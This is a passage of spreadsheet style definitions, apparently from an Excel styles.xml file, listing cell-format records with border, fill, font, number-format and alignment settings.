    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="11" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="9" fillId="3" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="4" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="5" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="13" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="14" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="15" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="16" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="8" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="3" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="4" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="5" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="5" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="3" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="4" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="8" numFmtId="3" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="4" numFmtId="3" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="16" fillId="7" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="3" fontId="4" numFmtId="3" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="8" fontId="4" numFmtId="3" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="7" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="8" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="3" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="4" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="5" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="7" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="2"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3" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="7" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="7" fontId="19" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="3" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="4" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="7" fontId="19" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="5" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="8" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="2" fontId="12"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2" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="16" fillId="0" fontId="21" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="17" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="13" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="16" fillId="0" fontId="22" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="7" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="8" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="1" fillId="8" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="8" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="8" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="9" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="9" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="9" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="8" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="3" fillId="0" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="6" fillId="10" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="10" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="10" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="11" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="11" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="11" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="11" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="23" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="12" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="12" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="14" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="12" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="16" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="17" fillId="13" fontId="4" numFmtId="49" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="2" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="13" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="25" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="25" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="1" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="27" numFmtId="1" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
